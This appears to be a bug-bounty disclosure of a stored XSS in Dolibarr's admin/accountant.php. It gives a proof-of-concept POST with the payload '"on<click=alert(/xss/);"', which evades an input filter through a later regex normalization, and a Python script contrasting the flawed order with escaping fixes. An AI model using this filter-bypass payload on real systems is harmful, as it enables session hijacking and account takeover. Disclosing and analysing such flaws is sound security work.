A stored XSS in dolibarr/htdocs/admin/accountant.php in dolibarr/dolibarr

Status: Valid

Reported on Jun 12th 2022


Description

I found a stored XSS in admin/accountant.php: the values submitted for the town, name and Accountant code fields are written back into a double-quoted HTML attribute and can break out of it. dolibarr/htdocs/main.inc.php applies a WAF-style input filter, so an inline JavaScript onxxx event handler cannot be injected directly. However, dolibarr/htdocs/core/lib/functions.lib.php (line 6643) contains this statement:

$temp = preg_replace('/<+([a-z]+)/i', '\1', $temp);

This replacement drops any run of '<' that immediately precedes letters, so inserting a '<' inside the handler name (on<click instead of onclick) lets the payload pass the filter in main.inc.php and then be rewritten into a valid onclick attribute before it is stored and rendered.

Proof of Concept

POST /dolibarr/htdocs/admin/accountant.php HTTP/1.1
...
...&town="on<click=alert(/xss/);"
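To make the ordering problem concrete, the following is an added example written for this page; it is not Dolibarr's code. The normalization regex is the one quoted above from functions.lib.php. The event-handler filter, the attribute rendering, the pipeline functions and the sample values are assumptions that model the class of checks the report describes, not the actual logic of main.inc.php.

```python
import html
import re
from typing import Optional

# The normalization quoted from dolibarr/htdocs/core/lib/functions.lib.php,
# preg_replace('/<+([a-z]+)/i', '\1', $temp), written with Python's re module.
# PCRE and Python agree on this pattern: one or more '<' directly before a run
# of letters is dropped and the letters are kept.
STRIP_LT_BEFORE_LETTERS = re.compile(r'<+([a-z]+)', re.IGNORECASE)


def normalize_lt(value: str) -> str:
    """'on<click' -> 'onclick'; a '<' not followed by a letter is left alone."""
    return STRIP_LT_BEFORE_LETTERS.sub(r'\1', value)


# Hypothetical, simplified input filter standing in for the "WAF" the report
# mentions. It is NOT main.inc.php's check; it only models a filter that
# rejects inline event handlers by looking for on<letters>= in the raw input.
EVENT_HANDLER = re.compile(r'on[a-z]+\s*=', re.IGNORECASE)


def blocked_by_filter(value: str) -> bool:
    return EVENT_HANDLER.search(value) is not None


def vulnerable_pipeline(value: str) -> Optional[str]:
    """The order the report describes: filter the raw input, normalize later.

    Returns the string that would be stored, or None if the filter rejected it.
    """
    if blocked_by_filter(value):
        return None
    return normalize_lt(value)


def hardened_pipeline(value: str) -> Optional[str]:
    """Normalize first, then filter, so the filter sees the string that is stored."""
    normalized = normalize_lt(value)
    if blocked_by_filter(normalized):
        return None
    return normalized


# Assumed rendering of the stored value into a double-quoted attribute.
def render_unescaped(stored: str) -> str:
    """Concatenates the value without encoding: a '"' in it ends the attribute."""
    return '<input type="text" name="town" value="' + stored + '">'


def render_escaped(stored: str) -> str:
    """Attribute-context encoding: '"' becomes &quot;, so no breakout is possible."""
    return '<input type="text" name="town" value="' + html.escape(stored, quote=True) + '">'


# The town value as it appears in the PoC request (constructed sample).
PAYLOAD = '"on<click=alert(/xss/);"'

if __name__ == "__main__":
    stored = vulnerable_pipeline(PAYLOAD)
    print("filter saw:     ", PAYLOAD)
    print("stored value:   ", stored)
    print("rendered (bad): ", render_unescaped(stored))
    print("rendered (ok):  ", render_escaped(stored))
    print("hardened order: ", hardened_pipeline(PAYLOAD))
```

Run stand-alone, the script shows the filter passing `"on<click=alert(/xss/);"`, the stored value becoming `"onclick=alert(/xss/);"`, and the unescaped template emitting `value=""onclick=alert(/xss/);""`, where the first `"` closes the attribute and `onclick=alert(/xss/);` becomes a new attribute of the input element. Two defences are shown: running the filter after normalization so it sees what will actually be stored, and encoding the value for the attribute context at output time. The output encoding is the primary fix, since it removes the quote breakout regardless of what the filter missed; reordering the filter is defence in depth. Neither is a claim about what the merged fix in Dolibarr does.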

The PoC Video

Impact

Because the payload is stored, it runs in the browser of every user who views the affected admin page. An attacker can use it to deface the page, take over user sessions and accounts, and run arbitrary JavaScript in the victim's browser, which can lead to a compromise of the victim's device.

We are processing your report and will contact the dolibarr team within 24 hours. (14 days ago)
i0hex modified the report (14 days ago)
We have contacted a member of the dolibarr team and are waiting to hear back. (13 days ago)
i0hex modified the report (13 days ago)
Laurent Destailleur validated this vulnerability (13 days ago)
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Laurent Destailleur confirmed that a fix has been merged on 2b5b99 (13 days ago)
Laurent Destailleur has been awarded the fix bounty